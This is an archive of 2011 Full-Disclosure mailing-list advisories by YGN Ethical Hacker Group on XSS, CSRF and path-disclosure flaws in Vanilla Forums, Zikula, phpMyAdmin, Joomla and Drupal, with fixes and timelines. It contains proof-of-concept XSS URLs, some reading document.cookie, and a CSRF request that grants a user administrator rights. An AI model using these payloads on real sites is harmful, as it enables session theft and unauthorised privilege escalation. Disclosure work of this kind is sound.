Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vanilla Forums 2.0.17.1 ~ 2.0.17.5 = Cross Site Scripting Vulnerability

2011-02-22 Thread YGN Ethical Hacker Group
1. OVERVIEW

The Vanilla Forums 2.0.17.1 till 2.0.17.5  were vulnerable to Cross
Site Scripting.


2. BACKGROUND

Vanilla Forums are open-source, standards-compliant, customizable
discussion forums.
It is specially made to help small communities grow larger through SEO
mojo, totally customizable social tools,
and great user experience. Vanilla is also built with integration at
the forefront, so it can
seamlessly integrate with your existing website, blog, or custom-built
application.


3. VULNERABILITY DESCRIPTION

The 'p' parameter  was not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

2.0.17.1 ~ 2.0.17.5


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/vanilla/index.php?p=/entry/;scriptalert(/XSS/)/script


6. SOLUTION

Upgrade to Vanilla Forums 2.0.17.6 or higher


7. VENDOR

Vanilla Forums Development Team
http://vanillaforums.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-01-25: notified vendor
2011-01-27: vendor released fix
2011-02-22: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.17.5]_cross_site_scripting
Github Issue Report:
https://github.com/vanillaforums/Garden/issuesearch?state=closedq=xss#issue/750
Vendor Commit: 
https://github.com/vanillaforums/Garden/commit/0a22506c76ac419d390d5d1bde5ec5f48b195358
Vendor Release:
http://vanillaforums.org/discussion/14397/vanilla-2.0.17-released/
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-02-22]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Zikula CMS 1.2.4 = Cross Site Request Forgery (CSRF) Vulnerability

2011-02-01 Thread YGN Ethical Hacker Group

Zikula CMS 1.2.4 = Cross Site Request Forgery (CSRF) Vulnerability



1. OVERVIEW

The Zikula 1.2.4 and lower versions were vulnerable to Cross Site
Request Forgery (CSRF).


2. BACKGROUND

Zikula is a Web Application Toolkit, which allows you to run
impressive websites and build powerful online applications. Zikula has
received praise for many things, but we belive the highlights are ease
of use, quick and easy development, security and performance and
lastly flexibility.


3. VULNERABILITY DESCRIPTION

Zikula CMS 1.2.4 and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

1.2.4 =


5. PROOF-OF-CONCEPT/EXPLOIT

The following request escalates a normal user to an administrator.

[REQUEST]
POST /zikula/index.php?module=userstype=adminfunc=processusersop=edit
HTTP/1.1

authid=userid=3do=yesaccess_permissions%5B%5D=2access_permissions%5B%5D=1uname=testeremail=tester%40yehg.netpass=vpass=activated=1theme=submit=
[/REQUEST]


6. SOLUTION

Upgrade to Zikula 1.2.5 or higher


7. VENDOR

Zikula Foundation
http://zikula.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-24: notified vendor
2011-01-25: vendor released fix
2011-02-01: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/
Vendor Released Info:
http://community.zikula.org/index.php?module=Newsfunc=displaysid=3041title=zikula-1.2.5-released
Zikula 1.2.5 Changlog:
http://code.zikula.org/core12/browser/tags/Zikula-1.2.5/src/docs/CHANGELOG
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery


#yehg [2011-02-01]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [Tool Update Announcement] inspathx - Path Disclosure Finder

2011-02-01 Thread YGN Ethical Hacker Group
Check the update via

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx


CHANGELOG
===

covered remaining checks (empty array, null cookie) in
Full_Path_Disclosure
(http://www.owasp.org/index.php/Full_Path_Disclosure) of OWASP
Application Security Desk Reference (ASDR) Project
(http://www.owasp.org/index.php/Category:OWASP_ASDR_Project)

added support for generating path definition file and you can now use
-d with path-definition file to check in addition to cms directory
path

added support for reading gzip/deflate compressed response from server

added regexp support (use your own regexp rules to search in returned
responses in addition to built-in regexp error messages)

added null session cookie  support
--null-cookie [will auto null session for all languages ]

added custom headers  support
--headers cookie: sid[%00]=1\r\nX-pingback:: %00

added data (GET/POST)  support
--data (var=1var=2)

added method (get by default)  support
--method post

added follow redirect support
--follow-redirect

added cold fusion language support; when feeded by large inputs, cold
fusion apps tend to reveal source code disclosure if without boundary
checks when used as IIS ISAPI extensions

added --rm option to remove directory used to generate path list
[suggestion by Brendan Coles]

cleaned *-vuln-path.txt file content to make it ready for path definition file

added support for [] , querystring in path definition file [suggestion
by Brendan Coles]

Added supported for username and web root path extraction for both
*nux and windows [suggestion by Brendan Coles]

added detection support for html_errors being set as off in php.ini
[suggestion by Sebastien Damaye]



THANKS
===


Ryan Dewhurst (http://www.ethicalhack3r.co.uk) for his suggestion to
cover all checks (empty array, null cookie) of
http://www.owasp.org/index.php/Full_Path_Disclosure
 --data, --param-array, -n/--null-session options.


Brendan Coles (http://itsecuritysolutions.org/, http://whatweb.net/)
for his suggestion that known web application paths should be bundled
for convenience and time saving. I've done files with dozens of
open-source web app known paths under 'paths' directory. You can do it
for your desired CMS/application by -d and -g options. See EXAMPLES
for more details. Submit latest path files to inspathx at yehg.net.


Sebastien.damaye for his write-up about inspathx tutorial ,
http://www.aldeid.com/index.php/Inspathx


And finally to developers community, their common coding practice,
their belief on path disclosure as server side issue
that make this tool meaningful and usable for current plus future web apps



100+ Web Apps with Full Path Disclosure using inspathx
===

https://code.google.com/p/inspathx/source/browse/#svn%2Ftrunk%2Fpaths_vuln


* Send bugs/suggestions to inspathx at yehg.net

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vanilla Forums 2.0.16 = Cross Site Scripting Vulnerability

2011-01-27 Thread YGN Ethical Hacker Group
==
Vanilla Forums 2.0.16 = Cross Site Scripting Vulnerability
==


1. OVERVIEW

The Vanilla Forums 2.0.16 and lower versions were vulnerable to Cross
Site Scripting.


2. BACKGROUND

Vanilla Forums are open-source, standards-compliant, customizable
discussion forums.
It is specially made to help small communities grow larger through SEO
mojo, totally customizable social tools,
and great user experience. Vanilla is also built with integration at
the forefront, so it can
seamlessly integrate with your existing website, blog, or custom-built
application.


3. VULNERABILITY DESCRIPTION

The 'Target' parameter was not properly sanitized after user logs in,
which allows attacker to conduct Cross Site Scripting attack.
An attacker could prepare a link in a forum post that includes a link
to a file which seems to require authentication.
Upon logging in, user will get XSSed.


4. VERSIONS AFFECTED

2.0.16 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://vanilla/index.php?p=/entry/signinTarget=javascript:alert(document.cookie)//http://


6. SOLUTION

Upgrade to Vanilla Forums 2.0.17 or higher


7. VENDOR

Vanilla Forums Development Team
http://vanillaforums.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-14: notified vendor
2011-01-18: vendor released fix
2011-01-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.16]_cross_site_scripting
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-27]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Multiple Web Applications | Full Path Disclosure

2011-01-27 Thread YGN Ethical Hacker Group
The following web applications are found to have full path disclosure
flaws (Ref: WASC-13, CWE-200).

-


htmlpurifier-4.2.0
phpids-0.6.5
PhpSecInfo
111WebCalendar-1.2.3
adodb
aef-1.0.8
ATutor-2.0
auth
b2evolution-3.3.3
bbpress-1.0.2
cftp-r80
claroline-1.9.7
clipbucket_2.0.9_stable_Fr
cmsmadesimple-1.9.2
CodeIgniter_1.7.2
concrete5.4.0.5
concrete5.4.1.1
CopperminePhotoGallery-1.5.12
craftysyntax3.0.2
CubeCart-4.4.3
dokuwiki-2009-12-25c
Dolphin-7.0.4
dotproject-2.1.4
drupal-7.0
e107_0.7.24
eggblog_4.1.2
elgg-1.7.6
ExoPHPDesk_1.2.1
eyeOS-2.2.0.0
fengoffice_1.7.2
freeway_1_5_alpha_Burstow
frontaccounting-2.3.1
helpcenterlive-2.1.7
hesk-2.2
jcow.4.2.1
joomla-1.6.0
kamads-2_b3
kplaylist.1.8.502
lifetype-1.2.10
limesurvey190plus-build9642-20101214
linpha-1.3.4
mambo-4.6.5
mantisbt-1.2.4
moodle-2.0.1
mound-2.1.6
mybb-1.6
nucleus3.61
NuSOAP
open-realty-2.5.8
OpenBlog-1.2.1
opencart_v1.4.9.3
opendocman-1.2.6-svn-2011-01-21
orangehrm-2.6.0.2
oscommerce-3.0a5
phorum-5.2.15a
PHP-Easy-Survey-Package-2.1.1
PHP-Nuke-8.0
PHP-Point-Of-Sale-10.7
phpads-2.0
phpAlbum_v0.4.1.14.fix06
phpBook-2.1.0
phpcollab-2.5
PHPDevShell-V3.0.0-Beta-4b
PHPfileNavigator-2.3.3
phpFormGen-2.09
phpfreechat-1.3
PhpGedView-all-4.2.3
phpicalendar-2.4
phpld-2-151.2.0
phpmyfaq-2.6.13
phprojekt-6.0.5
phpScheduleIt_1.2.12
phpwcms-1.4.7r412
piwigo-2.1.5
piwik-1.1
pixelpost_v1.7.3
pixie_v1.04
PliggCMS1.1.3
podcastgen1.3
prestashop_1.4.0.6
projectpier-0.8.0.3
serendipity-1.5.5
Smarty
statusnet-0.9.6
SugarCRM-6.1.0
taskfreak-multi-mysql-0.6
tcexam_11.1.015
textpattern-4.2.0
thebuggenie_2.1.2
theHostingTool-v1.2.3
TinyMCE
TinyWebGallery-1.8.3
tomatocart-1.1.3
vanilla-2.0.16
WebCalendar-1.2.3
WeBid-1.0.0
webinsta-mail-list-1.3e
WebsiteBaker_2.8.1
wordpress-3.0.4
xajax
xoops-2.5.0
YOURS
Zend
zikula-1.2.4




Vulnerable files list for each application can be found at

http://yehg.net/lab/pr0js/advisories/path_disclosure/

http://yehg.net/lab/pr0js/advisories/path_disclosure.zip


Solution:

Disable php error_display off.

For those who manage servers, set php error_display setting as 'on' in
php.ini file.
For those who don't, simple put php_flag error_display off in
.htaccess file of web root directory (unless it is restricted by
php_admin_flag)



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] phpMyAdmin 3.4.x, 3.4.0 beta 2 = Stored Cross Site Scripting (XSS) Vulnerability

2011-01-26 Thread YGN Ethical Hacker Group
===
 phpMyAdmin 3.4.x, 3.4.0 beta 2 = Stored Cross Site Scripting (XSS)
Vulnerability
===


1. OVERVIEW

The phpMyAdmin web application 3.4.0 beta 2 and lower versions of
3.4.x were vulnerable to Cross Site Scripting.


2. PRODUCT DESCRIPTION

phpMyAdmin is a free software tool written in PHP intended to handle
the administration of MySQL over the World Wide Web.
phpMyAdmin supports a wide range of operations with MySQL.
The most frequently used operations are supported by the user
interface (managing databases, tables, fields, relations,
indexes, users, permissions, etc), while you still have the ability to
directly execute any SQL statement.


3. VULNERABILITY DESCRIPTION

The 'db' parameter in phpMyAdmin was not sanitized and an attacker can
inject XSS string in 'db' field when creating or renaming a database.
An attacker can create new database name or rename database name
through several means like SQL Injection in user's vulnerable web
applications or
compromise of user account through brute-force or bypassing CSRF protection.
Even though the phpMyAdmin uses httpOnly as a protection against
cookie theft via XSS, attacker could use XSS tunneling proxy to
manipulate database names and fields. From it, he could execute
arbitrary database commands to allow him higher access to the server.


4. VERSIONS AFFECTED

phpMyAdmin 3.4.0 beta 2 and lower versions of 3.4.x

Vendor confirmed this flaw did not exist before the 3.4 version family.
Thus, it is assumed 2.x and 3.3 = versions are not affected.


5. PROOF-OF-CONCEPT/EXPLOIT

http://demo.phpmyadmin.net/trunk-config/index.php?db=%27%22--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.4.0-b2-xss.jpg


6. IMPACT

Attackers can compromise currently logged-in user session, plant xss
backdoors and inject arbitrary SQL statements
(CREATE,INSERT,UPDATE,DELETE)
via crafted XSS payloads.


7. SOLUTION

For those who're using version phpMyAdmin 3.4.0 beta 2 and lower,
check out the latest commit (git pull).


8. VENDOR

phpMyAdmin (http://www.phpmyadmin.net)


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-01-26: notified vendor
2011-01-26: vendor released fix
2011-01-27: vulnerability disclosed


11. REFERENCES

Vendor Commit: 
http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commit;h=f57daa0a59a0058a4b3be1bbdf1577b59d7d697a
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/phpmyadmin/[phpmyadmin-3.4.0-beta2]_cross_site_scripting(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html
Previous Releases:
http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php
http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php
http://www.phpmyadmin.net/home_page/security/PMASA-2008-5.php
http://www.phpmyadmin.net/home_page/security/PMASA-2008-6.php



#yehg [2011-01-27]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
Niels Braczek From Germany Joomla! Community has released a patch:

http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html

It uses the same Joomla! filtering function and thus it's supposed to safe.


For your convenience, download the patched file from
http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip
5368aa00b2d4746e025baa030babc888





Updated advisory.


==
 Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting.
CVE ID, CVE-2011-0005, has been assigned for it.


2. BACKGROUND

Joomla! is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets.


3. VULNERABILITY DESCRIPTION

The ordering parameter in a core module,com_search, is not properly
sanitized and thus vulnerable to XSS.
By leveraging this vulnerability, attackers can compromise currently
logged-in user/administrator session and impersonate arbitrary user actions
available under /administrator/ functions. As the vulnerability is based on
the core module, it affects both classic and customized Joomla! 1.0.x based
web sites.


4. VERSIONS AFFECTED

Joomla! 1.0.x ~ 1.0.15 series


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla1015/index.php?option=com_searchsearchword=xsssearchphrase=anyordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22


6. SOLUTION

Joomla 1.0.x series has been at end of life since 2009-07-22.

Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-06)

Apply the third-party patch:
http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-03: notified Joomla! Security Strike Team regardless of EOL status
2011-01-06: vulnerability disclosed
2011-01-07: vendor confirmed that they would not release patch


10. VENDOR RESPONSE

 While noted, your exploit report does not fall within the JSST remit as
 we no longer support J1.0.x branch (as you are aware and indicate).
 The vulnerability mentioned is not known to exist in any current
supported release.
 Please ensure you are using the latest version of Joomla!


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting
Patched File:
http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip
Joomla! 1.0.x End of Life -
http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-06]

#updated - 2011-01-14
- added patched link
#updated - 2011-01-07
- added VENDOR RESPONSE, CVE ID
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
Niels Braczek From Germany Joomla! Community has released a patch:

http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html

It uses the same Joomla! filtering function and thus it's supposed to safe.


For your convenience, download the patched file from
http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip
 5368aa00b2d4746e025baa030babc888





Updated advisory.



==
 Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting.
CVE ID, CVE-2011-0005, has been assigned for it.


2. BACKGROUND

Joomla! is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets.


3. VULNERABILITY DESCRIPTION

The ordering parameter in a core module,com_search, is not properly
sanitized and thus vulnerable to XSS.
By leveraging this vulnerability, attackers can compromise currently
logged-in user/administrator session and impersonate arbitrary user
actions available under /administrator/ functions. As the
vulnerability is based on the core module, it affects both classic and
customized Joomla! 1.0.x based web sites.


4. VERSIONS AFFECTED

Joomla! 1.0.x ~ 1.0.15 series


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla1015/index.php?option=com_searchsearchword=xsssearchphrase=anyordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22


6. SOLUTION

Joomla 1.0.x series has been at end of life since 2009-07-22.

Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-06)

Apply the third-party patch:
http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html



7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-03: notified Joomla! Security Strike Team regardless of EOL status
2011-01-06: vulnerability disclosed
2011-01-07: vendor confirmed that they would not release patch


10. VENDOR RESPONSE


 While noted, your exploit report does not fall within the JSST remit as
 we no longer support J1.0.x branch (as you are aware and indicate).
 The vulnerability mentioned is not known to exist in any current supported 
 release.
 Please ensure you are using the latest version of Joomla!


11. REFERENCES


Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting
Patched File: 
http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip

Joomla! 1.0.x End of Life -
http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-06]

#updated - 2011-01-14
- added patched link
#updated - 2011-01-07
- added VENDOR RESPONSE, CVE ID

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
==
Drupal 5.x, 6.x  = Stored Cross Site Scripting Vulnerability
==


1. OVERVIEW

Drupal 5.x and 6.x are currently vulnerable to Stored Cross Site Scripting.


2. BACKGROUND

Drupal is a free software package that allows anyone to easily
publish, manage and organize a wide variety of content on a website.
Hundreds of thousands of people and organizations are using Drupal to
power an endless variety of sites.


3. VULNERABILITY DESCRIPTION

The 'site_footer', 'name', 'explanation' parameters are not properly
sanitized in administration backend of Drupal 5.x and 6.x versions,
which could allow attackers to conduct stored cross site scripting
attacks.


4. VERSIONS AFFECTED

The vulnerability was tested in Drupal version 5.23 and 6.20,
currently latest versions of 5.x and 6.x families.
The recent released version Drupal 7 seems to be not vulnerable.


5. PROOF-OF-CONCEPT/EXPLOIT

= XSS in Footer (parameter: site_footer, module: system, url:
admin/settings/site-information)

The 'site_footer' parameter is not properly sanitized at site
information page (admin/settings/site-information)
and XSS payload can be set as footer text.
XSS will execute after Administration theme (url:
admin/settings/admin) is set to Marvin, and Chamelon.


= XSS in Role (parameter: name, module: role, url: admin/user/roles)

The 'name' parameter is not properly sanitized and XSS payload can be
set as a role name.
This will affect in administration pages as well as user registration
page if the role is set to be shown.


= XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)

The 'explanation' parameter is not properly sanitized when adding new

* single-line textfield
* multi-line textfield
* checkbox
* list selection
* freeform list
* URL
* date

XSS can be executed in user registration page, user profile, and
member list pages if it is set to be visible.


See:
http://attacker.in/drupal6/
http://attacker.in/drupal6/user/register
http://attacker.in/drupal6/user/[ID]/edit/xss


6. IMPACT

This XSS attack can be directly conducted on drupal sites where
anti-csrf form_token check is disabled.
If it is enabled, attacker must find ways to bypass anti-csrf token
using revolutionary or traditional methods.
After compromising it, attackers can plant persistent XSS backdoors in
user registration page,user profile page, member list pages, user
roles and profile settings pages of administration backend.


7. SOLUTION

Upgrade to Drupal 7.
Lock down access to administration backend.
Disable Full HTML formatting for sites that allow public user registration.


8. VENDOR

Drupal Development Team
http://drupal.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-12-30: notified vendor
2010-12-31: vendor replied 'not considered as vulnerabilities'
2011-01-14: vulnerability disclosed


11. VENDOR RESPONSE

 The issues you report are not considered security vulnerabilities since 
 advanced permissions
(which in and of themselves would allow malicious users to take over a site) 
are required
 in order to exploit them. For the issues you reported, administer site 
 configuration is required to
 edit the site footer message, and administer users is required to add/edit 
 role names and profile fields.

 See the section What About Vulnerabilities Which Require Advanced 
 Permissions? in
 http://drupal.org/security-advisory-policy for additional information.


12. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/
About Drupal: http://drupal.org/about
Drupal Security Policy: http://drupal.org/security-advisory-policy
Disabling Form Token Check: http://data.agaric.com/node/2343
Anti-CSRF measures and XSS:
http://nileshkumar83.blogspot.com/2010/07/anti-csrf-measures-and-xss.html
Bypassing CSRF protections:
http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
Defeating Anti-CSRF XSS:
http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/
Defeating Anti-CSRF XSS:
http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html

#yehg [2011-01-14]



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
==
Drupal 5.x, 6.x  = Stored Cross Site Scripting Vulnerability
==


1. OVERVIEW

Drupal 5.x and 6.x are currently vulnerable to Stored Cross Site Scripting.


2. BACKGROUND

Drupal is a free software package that allows anyone to easily
publish, manage and organize a wide variety of content on a website.
Hundreds of thousands of people and organizations are using Drupal to
power an endless variety of sites.


3. VULNERABILITY DESCRIPTION

The 'site_footer', 'name', 'explanation' parameters are not properly
sanitized in administration backend of Drupal 5.x and 6.x versions,
which could allow attackers to conduct stored cross site scripting
attacks.


4. VERSIONS AFFECTED

The vulnerability was tested in Drupal version 5.23 and 6.20,
currently latest versions of 5.x and 6.x families.
The recent released version Drupal 7 is not vulnerable.


5. PROOF-OF-CONCEPT/EXPLOIT

= XSS in Footer (parameter: site_footer, module: system, url:
admin/settings/site-information)

The 'site_footer' parameter is not properly sanitized at site
information page (admin/settings/site-information)
and XSS payload can be set as footer text.
XSS will execute after Administration theme (url:
admin/settings/admin) is set to Marvin, and Chamelon.


= XSS in Role (parameter: name, module: role, url: admin/user/roles)

The 'name' parameter is not properly sanitized and XSS payload can be
set as a role name.
This will affect in administration pages as well as user registration
page if the role is set to be shown.


= XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)

The 'explanation' parameter is not properly sanitized when adding new

* single-line textfield
* multi-line textfield
* checkbox
* list selection
* freeform list
* URL
* date

XSS can be executed in user registration page, user profile, and
member list pages if it is set to be visible.


See:
http://attacker.in/drupal6/
http://attacker.in/drupal6/user/register
http://attacker.in/drupal6/user/[ID]/edit/xss


6. IMPACT

This XSS attack can be directly conducted on drupal sites where
anti-csrf form_token check is disabled.
If it is enabled, attacker must find ways to bypass anti-csrf token
using revolutionary or traditional methods.
After compromising it, attackers can plant persistent XSS backdoors in
user registration page,user profile page, member list pages, user
roles and profile settings pages of administration backend.


7. SOLUTION

Upgrade to Drupal 7.
Lock down access to administration backend.
Disable Full HTML formatting for sites that allow public user registration.


8. VENDOR

Drupal Development Team
http://drupal.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-12-30: notified vendor
2010-12-31: vendor replied 'not considered as vulnerabilities'
2011-01-14: vulnerability disclosed


11. VENDOR RESPONSE

 The issues you report are not considered security vulnerabilities since 
 advanced permissions
(which in and of themselves would allow malicious users to take over a site) 
are required
 in order to exploit them. For the issues you reported, administer site 
 configuration is required to
 edit the site footer message, and administer users is required to add/edit 
 role names and profile fields.

 See the section What About Vulnerabilities Which Require Advanced 
 Permissions? in
 http://drupal.org/security-advisory-policy for additional information.


12. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[drupal.5.x,6x]_cross_site_scripting
About Drupal: http://drupal.org/about
Drupal Security Policy: http://drupal.org/security-advisory-policy
Disabling Form Token Check: http://data.agaric.com/node/2343
Anti-CSRF measures and XSS:
http://nileshkumar83.blogspot.com/2010/07/anti-csrf-measures-and-xss.html
Bypassing CSRF protections:
http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
Defeating Anti-CSRF XSS:
http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/
Defeating Anti-CSRF XSS:
http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html

#yehg [2011-01-14]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
On Fri, Jan 14, 2011 at 4:28 AM, Justin Klein Keane jus...@madirish.net wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Drupal security has been aware of this issue for quite some time now.
 But basically, as their response indicates, you need admin access to
 exploit these issues.  However, if you have admin access you can execute
